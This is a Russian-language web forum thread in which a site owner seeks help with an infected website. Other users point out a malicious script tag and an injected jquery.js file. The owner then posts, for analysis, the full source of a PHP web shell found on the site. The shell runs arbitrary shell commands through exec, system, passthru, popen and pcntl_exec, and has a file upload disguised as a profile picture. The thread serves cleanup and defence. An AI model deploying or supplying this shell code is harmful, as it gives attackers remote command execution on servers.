Вирус на сайте

VIP хостинг для вашего сайта

1751

GodZiLLa 13.12.2017 / 23:55 Автор
Последний из могикан

Нет такой проги и такого сервиса, который может так тщательно просканировать твой сайт.
Что то около этого есть, но универсального средства нет, только мозгами и ручками можно и надёжно.
Просто пока не могу сообразить, где ещё может быть засада. Разве что только хостера тревожить.

dimon 14.12.2017 / 00:13
Пришелец

®_GodZiIIa_€,
Вот держи ссыль за инфу по твоей теме.
Тут как раз хоть будешь уже иметь представление что и где именно искать при атаке. За одно расписанно и за ручной поиск проблемы, как ты говоришь без применения прог и сервисов по сканированию.
https://defcon.ru/web-security/326/

Изменил: dimon (14.12.2017 / 00:15)

Nervous 14.12.2017 / 04:48
Отрешенный Nervous

®_GodZiIIa_€, Вот твое чудо
<script type="text/javascript" src="https://cloudcdn.gdn/js/?trl=0.30">
Вот твой js файл в котором прописан код
http://basaru.net.ru/engine/classes/js/jquery.js
Посмотри когда был изменен этот файл (число и время), значит тогда всунули в него код. Потом идешь к логам и смотришь логи, как попали в этот файл.

Thor 14.12.2017 / 08:47
Пришелец

®_GodZiIIa_€,

Хостинг beget

хост говно если честно, хостер думаю тоже

Олегъ 14.12.2017 / 10:42
Пришелец

Если есть какой скрытый код на странице, то его всегда обязательно видно в исходном коде, посмотри сам в браузере исходный код страницы, там всё видно что встроено всегда.

Добавлено через 02:18 сек.
И бегет нормальный хостинг, пользуюсь тарифом фри почти три года и имею несколько разный аккаунтов и сайтов на разных ай пи и ни разу никогда не было у меня к ним никаких замечаний, всегда все сайты быстрые и доступные.

GodZiLLa 14.12.2017 / 13:24 Автор
Последний из могикан

Отрешенный NERVOUS., спасибо, именно то !
Как это файл оказался заражённым, не понятно, дата изменения более года назад, а проявилось всё только сейчас.
Заменил файл нормальным, теперь всё без лишнего кода.
Придётся теперь отслеживать изменения, возможно где то бэкдор,
а может ещё раньше сам занёс вирусный файл, буду разбираться.
Всем огромная благодарность за подсказки, все они были важны.

А бегет да, нормальный хост, уже год на нём, всё нормально.
Кстати писал в поддержку, ответили и нашли проблемы, и тот же файл, что и Отрешенный NERVOUS указал, за что ему двойная благодарность !

GodZiLLa 14.12.2017 / 14:16 Автор
Последний из могикан

Вопрос к знатокам :
В этом коде есть шелл, или иные средства для взлома ?

< php <font face="monospace,terminal" size="-1"><pre><?php ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result);
$result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); } 
elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); } 
elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions"); 
if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); } 
if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); } 
if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br></pre>

GodZiLLa 14.12.2017 / 14:17 Автор
Последний из могикан

Продолжение кода

<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit"></form><br><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit"></form><form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit"></form><script>document.getElementById("bash").focus();</script></font><?php $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); 
echo $text; ?>

Андрей 14.12.2017 / 20:55
Чатланин

®_GodZiIIa_€, чот код в куче отформатируй его

GodZiLLa 14.12.2017 / 22:29 Автор
Последний из могикан

Сайт не вмещает в пост отформатированный, ограничение.

Для выполнения действия необходимо авторизоваться!

Стикеры / Теги / Правила / Топ тем / Топ постов / Поиск